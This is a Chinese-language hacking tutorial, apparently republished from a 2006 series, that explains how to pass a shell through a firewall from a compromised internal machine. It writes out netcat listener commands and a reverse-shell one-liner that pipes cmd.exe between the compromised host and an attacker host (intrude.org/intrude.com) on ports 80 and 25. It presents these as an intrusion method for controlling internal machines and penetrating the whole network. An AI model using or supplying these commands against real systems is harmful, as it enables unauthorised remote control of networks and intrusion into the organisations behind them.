战术攻防思维撷粹(2)
2006-07-04 20:29:23 来源:WEB开发网核心提示: **防火墙下的暗道前面所探讨的控制权利似乎都基于了网络管理不设防行为而布置的策略,然而,战术攻防思维撷粹(2)(3),现实世界的网络中必然不能缺少防火墙之类的堡垒的,于是前面的思维模式似乎变的到处碰壁,然而,为节省篇幅,无计可施,总所周知
**防火墙下的暗道
前面所探讨的控制权利似乎都基于了网络管理不设防行为而布置的策略,然而,现实世界的网络中必然不能缺少防火墙之类的堡垒的。于是前面的思维模式似乎变的到处碰壁,无计可施。
总所周知,防火墙总是放行一些“行为端正”的数据通过自身,源于这个要点,我们实现了架设防火墙下暗道的思路:在防火墙内部尽力得到一部受“污染”的机器,在其上安装端口重定向软件并监听端口,将监听获得的原始分组转发到特定的第二目标。为了便于理解,下面我们就以著名的nc.exe做个端口重定向的小实验:
首先,在攻击者机器<intrude.org>分别使用两个命令行终端,记住是不同的两个终端窗口。其中一个窗口监听80端口,另一个端口监测25端口。
C:\toolbox>nc –nvv –l –p 80
C:\toolbox>nc –nvv –l –p 25
其次,在防火墙内部的机器使用shell回铲的办法(这里假设受污染机器<dirty.net>上已经有nc.exe并且安装远程执行命令服务):
C:\toolbox>nc intrude.com 80 | cmd.exe | nc intrude.org 25
一般,防火墙总会允许http和smtp服务的数据进出,这样,上面的命令就可以从受污染的机器铲回一个远程命令shell来控制防火墙内部机器(在入侵者的机器中,在监听80端口的窗口输入命令,其结果就可以在监听25端口的窗口显示出来),甚至渗透整个内部网络。这种暗道的正确说法也被称为回铲(shovel)。
这种令初学者头晕的思维实在模糊,一个简单易用的端口重定向工具rinetd,其使用非常简单,只需要创建一个转发配置文件就可以启动。然而,为节省篇幅,下面讲述将是基于重定向原理而产生的精品fpipe。
[]
赞助商链接